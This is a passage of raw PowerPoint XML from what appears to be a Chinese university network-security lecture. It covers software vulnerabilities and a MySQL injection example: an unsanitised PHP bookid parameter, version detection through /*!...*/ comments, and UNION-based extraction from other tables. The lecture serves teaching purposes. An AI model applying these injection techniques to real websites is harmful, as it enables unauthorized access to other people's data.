          </p:cNvPr>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6780E46C-6438-8543-B0F4-42AB4AC0A0DE}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="354333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0AAF67B-00C9-C444-8DFD-189A58A72C13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="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6" name="页脚占位符 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{888DDE9B-C77F-2347-A5EE-4038D771B251}"/>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zh-CN" altLang="en-US"/>
              <a:t>网络攻防技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="灯片编号占位符 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94A0BB12-861B-4B4E-83D9-F9F812EB2634}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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910DEF4-9472-4D4E-A774-5E5C96C3A242}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="288342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455716D-22BE-3C45-809B-014BAB302411}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="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8" name="页脚占位符 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B995663-F608-C640-B433-641892B98021}"/>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zh-CN" altLang="en-US"/>
              <a:t>网络攻防技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="灯片编号占位符 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0618B6AB-729C-C340-A0A6-0B2CE4A18470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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86378C2D-01DC-B745-A698-A5585B2F41C3}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344622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837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51CC53-EA94-8C41-A9AE-05E8EBEC2420}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="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3" name="页脚占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F07FD47A-B13C-7347-A08E-D85A3B78FE15}"/>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zh-CN" altLang="en-US"/>
              <a:t>网络攻防技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74B9CE3B-A7FD-814A-8E48-A97C85538959}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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97A5E43-7532-FC40-BB9A-4A18207D4491}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35967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hyperlink" Target="http://dc-security.org/" TargetMode="Externa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3" r:id="rId1"/>
    <p:sldLayoutId id="2147483894" r:id="rId2"/>
  </p:sldLayoutIdLst>
  <p:transition spd="slow">
    <p:push dir="u"/>
  </p:transition>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C7E583C-B2EA-4646-B1EA-7959A6F6BCCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="0" y="152400"/>
            <a:ext cx="8686800" cy="6096000"/>
            <a:chOff x="0" y="96"/>
            <a:chExt cx="5472" cy="3840"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4099" name="AutoShape 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9447623A-2B95-F443-B3E7-494FA4B2A574}"/>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a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4100" name="AutoShape 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{972ED738-775B-B54F-92D3-41AB42B87592}"/>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w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2400" b="1">
                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4101" name="Line 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28649C69-A9BE-6845-8888-8DD3BD07A413}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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zh-CN" altLang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{396D2644-B454-7343-A410-1AD330B10EA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="395288" y="260350"/>
            <a:ext cx="7023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7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6EB9315-11E5-C84C-AA44-8752C50DB1A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7E34B48-E9C4-DF41-ABD7-2AC5D73899FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3429000" y="6376988"/>
            <a:ext cx="2143125" cy="338137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>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t>计算机网络安全</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D716C2AA-5252-E14A-8D54-D61A97DF887D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="357188" y="6376988"/>
            <a:ext cx="1214437" cy="338137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>何路</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{912023C7-955F-044F-9C3B-746F42912A11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="6376988"/>
            <a:ext cx="2571750" cy="338137"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>http://dc-security.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" b="1" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="251740895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charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4200" b="1">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Arial" charset="0"/>
          <a:ea typeface="宋体" pitchFamily="2" charset="-122"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="42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l"/>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b="1">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="2514600" indent="-228600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="bg2"/>
        </a:buClr>
        <a:buSzPct val="40000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buChar char="l"/>
        <a:defRPr sz="2000" b="1">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b="1">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b="1">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hyperlink" Target="Ex/TestStackJump.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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>软件安全</a:t>
            </a:r>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a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>章</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="C0C0C0"/>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                    <a:srgbClr val="C0C0C0"/>
                  </a:outerShdw>
                </a:effectLst>
              </a:rPr>
              <a:t>电子科技大学信息与软件工程学院  </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软件漏洞的特点</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122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lgn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US">
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>程序漏洞：能够取得管理权，危险的漏洞</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN">
              <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="571500" indent="-571500" algn="l">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US">
                <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
                <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>安全策略漏洞：容易利用</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN">
              <a:ea typeface="楷体" pitchFamily="49" charset="-122"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10342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创建并初始化数据库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="103428" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="523875" y="1773238"/>
            <a:ext cx="8054975" cy="3332162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>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MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入实例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10445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服务器端处理数据查询</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="104452" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="488950" y="1773238"/>
            <a:ext cx="8124825" cy="2755900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>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问题</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1054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PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脚本代码没有对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>$REQUEST[‘bookid’]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>做任何处理，直接传递给数据库查询</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>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导致后果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10649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判断</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>扩展功能：可以用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/*!...*/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注释语句实现各版本功能的兼容</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>例</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>bookid=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>对应页面存在，则如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>版本为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200"/>
              <a:t>5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3200"/>
              <a:t>，则第一个地址返回错误页面，第二个地址返回正确页面</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3200"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="106500" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1619250" y="3573463"/>
            <a:ext cx="4938713" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="106501" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1638300" y="4292600"/>
            <a:ext cx="4953000" cy="222250"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>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导致后果</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1075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联合查询的利用</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>联合查询是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MySQL4.0.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>新增的功能，它极大地增加了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入漏洞时的危险性，可以轻易获取其他数据表的信息</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="971550" lvl="1" indent="-571500">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>限制</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="2" indent="-571500"/>
